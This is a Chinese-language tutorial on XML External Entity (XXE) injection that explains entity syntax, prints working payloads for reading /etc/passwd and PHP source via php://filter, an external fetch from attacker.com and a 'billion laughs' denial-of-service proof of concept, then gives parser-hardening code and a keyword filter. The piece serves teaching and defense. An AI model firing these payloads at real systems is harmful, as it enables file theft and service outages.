0×00 前言
XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题.
在XML1.0标准⾥里,XML文档结构⾥里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安全问题.
0×01 威胁
XXE漏洞目前还未受到广泛关注,Wooyun上几个XXE引起的安全问题:
pull-in任意文件遍历/下载从开源中国的某XXE漏洞到主站shell：/Article/201406/310927.html百度某功能XML实体注入百度某功能XML实体注入(二)
借助XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.
对于不同XML解析器,对外部实体有不同处理规则,在PHP中默认处理的函数为: xml_parse和simplexml_load xml_parse的实现方式为expat库，默认情况不会解析外部实体,而simplexml_load默认情况下会解析外部实体,造成安全威胁.除PHP外，在Java，Python等处理xml的组件及函数中都可能存在此问题
0×02 语法
要写Payload,首先要对XML实体语法有一定了解
XML中entity的定义语法为:

<!DOCTYPE filename  
[  
<!ENTITY entity-name "entity-content" 
]>

如果要引用一个外部资源,可以借助各种协议 几个例子:

file:///path/to/file.ext  
http://url/file.ext  
php://filter/read=convert.base64-encode/resource=conf.php

故构造几种简单的Payload模型如下:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xdsec [ 

<!ELEMENT methodname ANY >

<!ENTITY xxe SYSTEM
"[file:///etc/passwd](file:///etc/passwd)"
>]>

<methodcall>

<methodname>&xxe;</methodname>

</methodcall>

亦可读取网站内容

<?xml version=
"1.0"
encoding=
"utf-8"
?>

<!DOCTYPE xdsec [ 

<!ELEMENT methodname ANY >

<!ENTITY xxe SYSTEM
"[http://attacker.com/text.txt](http://attacker.com/text.txt)"
>]>

<methodcall>

<methodname>&xxe;</methodname>

</methodcall>

如果包含文件失败,可能是由于读取php等文件时文件本身包含的<等字符.可以使用Base64编码绕过,如:

<?xml version=
"1.0"
encoding=
"utf-8"
?>

<!DOCTYPE xdsec [ 

<!ELEMENT methodname ANY >

<!ENTITY xxe SYSTEM
"[php://filter/read=convert.base64-encode/resource=index.php](php://filter/read=convert.base64-encode/resource=index.php)"
>]>

<methodcall>

<methodname>&xxe;</methodname>

</methodcall>

0×03 攻击
借助XXE,有几种可用且公开的攻击方式:
拒绝服务
POC:

<?xml version = "1.0"?>
<!DOCTYPE lolz [  
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]>
<lolz>&lol9;</lolz>

POC中中先定义了lol实体，值为”lol”的字符串,后在下面又定义了lol2实体，lol2实体引用10个lol实体，lol3又引用了10个lol2实体的值，依此类推，到了最后在lolz元素中引用的lol9中，就会存在上亿个”lol”字符串此时解析数据时未做特别处理，即可能造成拒绝服务攻击。

此外还有一种可能造成拒绝服务的Payload,借助读取/dev/random实现.

内网信息

借助各种协议如http,XXE可以协助扫描内网,可能可以访问到内网开放WEB服务的Server,并获取其他信息

XXE注入攻击与防御

文件读取
最常规也是最有效的利用思路

<?xml version=
"1.0"
encoding=
"utf-8"
?>

<!DOCTYPE xdsec [ 

<!ELEMENT methodname ANY >

<!ENTITY xxe SYSTEM
"[file:///etc/passwd](file:///etc/passwd)"
>]>

<methodcall>

<methodname>&xxe;</methodname>

</methodcall>

0×04 防御
方案一、使用开发语言提供的禁用外部实体的方法
PHP：
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python：
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二、过滤用户提交的XML数据
关键词：<!DOCTYPE和<!ENTITY，或者，SYSTEM和PUBLIC。
【最后】
无论是WEB程序，还是PC程序，只要处理用户可控的XML都可能存在危害极大的XXE漏洞，开发人员在处理XML时需谨慎，在用户可控的XML数据里禁止引用外部实体。
文中涉及到的代码和技术细节，只限用于技术交流，切勿用于非法用途。欢迎探讨交流，行文仓促，不足之处，敬请不吝批评指正。

【参考】
http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf
https://www.owasp.org/images/5/5d/XML_Exteral_Entity_Attack.pdf
https://www.youtube.com/watch?v=j2cfebNEfic